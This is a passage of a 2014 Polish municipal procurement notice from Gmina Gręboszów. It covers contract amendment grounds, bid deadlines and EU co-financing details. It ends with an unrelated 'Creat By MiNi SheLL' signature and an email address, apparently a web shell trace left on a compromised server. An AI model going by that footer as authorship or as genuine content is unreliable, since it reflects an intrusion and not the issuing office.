                 wstrzymanie robót przez Zamawiającego,  spowodowanych sytuacją finansową, zdolnościami 
                 płatniczymi lub warunkami organizacyjnymi bądź okolicznościami, które nie były do przewidzenia 
                 w  chwili zawarcia umowy,
           e)   inne przyczyny zewnętrzne niezależne od  Zamawiającego oraz Wykonawcy skutkujące   
                 niemożliwością  prowadzenia prac, np.: będące następstwem działania organów administracji, 
                 wstrzymanie prac budowlanych przez właściwy organ, opóźnienia związane z uzyskiwaniem przez 
                 Wykonawcę lub Zamawiającego niezbędnych w myśl ustawy Prawo budowlane dokumentów
           f)   wystąpienia istotnych wad dokumentacji projektowej, skutkującej koniecznością dokonania poprawek 
                 lub  uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizacje określonego rodzaju robót 
                 mających   wpływ na zmianę Terminu realizacji przedmiotu Umowy,
           g)   innymi okolicznościami nie powstałymi  z winy Wykonawcy lub koniecznością wykonania zamówień
                 uzupełniających.    
           W przypadku wystąpienia którejkolwiek z okoliczności wyżej wymienionych, termin wykonania  umowy 
            może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonywania  jej przedmiotu, 
           nie dłużej jednak niż o okres trwania tych okoliczności.

     2)    Zmiana Sposobu spełniania świadczenia;
     a)   wystąpienia w trakcie realizacji przedmiotu umowy konieczności  wykonania robót zamiennych 
           w stosunku do przewidzianych dokumentacja projektową, w sytuacji gdy wykonanie tych robót będzie
           niezbędne dla prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień 
           odbioru robót przepisami wykonania przedmiotu umowy.
     b)   wprowadzenie zamiany materiałów i urządzeń przedstawionych w ofercie przetargowej,  pod warunkiem,
           że zmiany te będą  korzystne  dla Zamawiającego. Będą to, przykładowo,  okoliczności:
          - powodujące obniżenie kosztu ponoszonego przez zamawiającego na eksploatacje i konserwacje 
            wykonanego  przedmiotu umowy,
          - powodujące poprawienie parametrów technicznych,
          - wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących 
            przepisów.
          Dodatkowo możliwa jest  zmiana producenta poszczególnych materiałów i urządzeń przedstawionych 
          w ofercie przetargowej, pod  warunkiem, że zmiana ta nie spowoduje obniżenia parametrów tych 
          materiałów lub urządzeń.
    c)   Ustala się, że wszelkie roboty zamienne  będą wykonywane przy zachowaniu nie pogorszonych norm, 
          standardów   i parametrów,  a Zamawiający nie może ponieść ryzyka zwiększenia wynagrodzenia
          z tytułu   takich  zmian.
    d)   rezygnację  z realizacji części robót będącej przedmiotem  Umowy. W takim przypadku  wynagrodzenie    
    przysługujące Wykonawcy zostanie pomniejszone, przy czym  Zamawiający  zapłaci  za   wykonane    
    roboty, które Wykonawca wykonał w oparciu o bazę cen  z przetargu, po ich  uprzednim  
    zinwentaryzowaniu i przedłożeniu zaakceptowanego kosztorysu  różnicowego powykonawczego.
e)  zmiany stanu prawnego w zakresie dotyczącym realizowanej Umowy, który spowoduje konieczność 
       zmiany  sposobu wykonania  zamówienia przez Wykonawcę.
f)   konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych 
   lub   materiałowych  niż  wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie  
   przewidzianych     rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem  przedmiotu  
   Umowy albo ich zastosowanie     byłoby  korzystne dla Zamawiającego.  Zmiana ta będzie wprowadzona 
   wyłącznie w zakresie umożliwiającym oddanie przedmiotu  umowy do  użytkowania, a Zamawiający nie   
   może ponieść ryzyka zwiększenia wynagrodzenia z tytułu takich zmian.
g)  konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych 
   lub   materiałowych   niż  wskazane w dokumentacji projektowej ze względu na zmiany  obowiązującego 
   prawa.
h)  wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne 
      podmioty inwestycjami w zakresie niezbędnym  do uniknięcia lub usunięcia tych kolizji,
i)   wystąpienia Siły wyższej uniemożliwiającej wykonywanie przedmiotu Umowy zgodnie 
   z jej postanowieniami.   
    3)     Pozostałe zmiany
      a)  Zmiana stawki podatku od towarów i usług VAT związana jest ze zmianą obowiązujących przepisów  
           prawa.  W takim przypadku zamawiający dopuszcza  możliwość odpowiednio zwiększenia lub 
           zmniejszenia  wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT płaconego przez 
           wykonawcę. 
      b)  zmiana umożliwiająca usunięcie rozbieżności  lub niejasności w rozumieniu pojęć użytych  w umowie 
           w celu jej doprecyzowania i   jednoznacznej interpretacji  jej zapisów przez strony,    
     c)   zaistnienia innych niemożliwych do przewidzenia w momencie zawarcia umowy okoliczności prawnej,   
           ekonomicznej lub technicznej,   za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem 
            możliwości należytego wykonania umowy, zgodnie ze SIWZ - Zamawiający  dopuszcza możliwość 
           zmiany  umowy, w szczególności terminu realizacji zamówienia umowy. 
3.  W razie wątpliwości, przyjmuje się, że nie wymagają zmiany Umowy następujące zmiany:
     1) danych związanych obsługą administracyjno - organizacyjną Umowy,
     2) danych adresowych,
     3) danych rejestrowych,     
     4) harmonogramu rzeczowo - finansowego realizacji Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.malopolska.pl/uggreboszow/Article/id,135590.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gręboszów, pokój nr 2 lub za zaliczeniem pocztowym, po uprzednim złożeniu wniosku, nie później niż 6 dni przed terminem składania ofert. Cena 100 zł + VAT 23 %..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.07.2014 godzina 10:00, miejsce: 15 lipca 2014 godzina 10:00, miejsce: Urząd Gminy Gręboszów, Gręboszów 144, 33-260 Gręboszów, pokój nr 11 (piętro) w sekretariacie Urzędu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Działania Odnowa i Rozwój Wsi objętego PROW na lata 2007-2013...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com